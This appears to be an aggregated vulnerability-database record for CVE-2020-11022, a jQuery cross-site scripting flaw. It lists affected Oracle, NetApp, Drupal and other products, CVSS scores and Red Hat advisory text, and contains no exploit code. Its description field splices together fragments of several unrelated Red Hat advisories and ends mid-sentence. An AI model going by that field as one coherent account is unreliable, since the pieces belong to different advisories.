These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-8203 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/cve/CVE-2020-11023 https://access.redhat.com/security/cve/CVE-2020-14333 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX2t0HtzjgjWX9erEAQhpWg/+KolNmhmQCrst8TmYsC2IgSdHP+q0LKLj gdPZYu0ixOpwLLiAhrsoDXqL3H3w7UDSKkSISgPMEqEde4Vp+zI37O1q3E/P7CAj rfLGuL1UDEiy0q0g1BP13GrPlg6K4fR5wQAnTB6vD/ZY+wd50Z0T+NGAxd2w68bM R5q1kSOUPc4AZt25FORU2cmp775Y7DWazMWHC77uiJHgyCwVqLtdO09iEnglZDKJ BynwyT8exZKXxmmpE4QZ4X7wNo3Y0mTiRZo5eyxxQpwj9X+qw1V+pBdtMH/C1yhk J+X1f+wDoe2jCx2bqPXqp6EgFSHnJNt96jV0oTdD0f8rMgWcBDStNXdagPBmBCBp t+Kq3BZx0Oqkig4f+DCEmoS0V0fB9UQLg0Q/M9p1bTfYQkbn+BMHL7CAp8UyAzPH A1HlnP7TtQgplFvoap82xt2pXh97VvI6x3sBGHyW4Fz0SykhRYx3dAgmqy5nEssl 5ApWZ87M3l+2tUh4ZOJAtzRDt9sL5KQsXjp1jZaK/gWBsL4Suzr9AIrs4NmRmXnY TzxdXgIY6C+dWmB4TPhcJE5etcvtorqvs93d47yBdpRyO/IlbEw0vLUBdVZZuj9N mqp6RcHqDKm6Yv4B73Ud5my44wSRWVWtBxO6fivQOQG7iqCyIlA3M3LUMkVy+fxc bvmOI0eIsZw=Jhpi -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services data foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6.0.0"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.0-19.1.2"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.0"
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.14"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.3.0"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "hospitality materials control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.2"
},
{
"_id": null,
"model": "financial services data governance for us regulatory reporting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.6"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "enterprise session border controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.4"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "insurance allocation manager for enterprise profitability",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance accounting analyzer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "jquery",
"scope": "gte",
"trust": 1.0,
"vendor": "jquery",
"version": "1.2"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services data governance for us regulatory reporting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "7.0"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.6"
},
{
"_id": null,
"model": "communications diameter signaling router idih\\:",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.0.0.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for european banking authority",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.8"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.20"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.0"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications application session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.8m0"
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.3.6.0.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "7.70"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.1.0"
},
{
"_id": null,
"model": "financial services balance sheet planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "insurance allocation manager for enterprise profitability",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6-8.1.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.56"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for us federal reserve",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.2"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.0"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.0.0"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "financial services data foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.20"
},
{
"_id": null,
"model": "storagetek acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.5.0"
},
{
"_id": null,
"model": "financial services liquidity risk management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0.0.0"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "log correlation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "tenable",
"version": "6.0.9"
},
{
"_id": null,
"model": "communications diameter signaling router idih\\:",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1.1"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.4.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services regulatory reporting for us federal reserve",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "max data",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for european banking authority",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "agile product supplier collaboration for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.5.0.23.0"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "retail customer management and segmentation foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.1.3"
},
{
"_id": null,
"model": "hitachi ops center common services",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "jquery",
"scope": null,
"trust": 0.8,
"vendor": "jquery",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
}
],
"trust": 0.6
},
"cve": "CVE-2020-11022",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11022",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-163559",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11022",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2020-11022",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-11022",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11022",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2020-11022",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-11022",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULHUB",
"id": "VHN-163559",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11022",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"description": {
"_id": null,
"data": "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in \u0027path length\u0027 constraint field in CA\u0027s Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. \n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in \u0027path length\u0027 constraint field in CA\u0027s Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag\u0027s python client does not validate certificates\n1855319 - Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki ca-user-cert-add with secure port failed with \u0027SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT\u0027\n\n6. You can also manage\nuser accounts for web applications, mobile applications, and RESTful web\nservices. Description:\n\nRed Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for 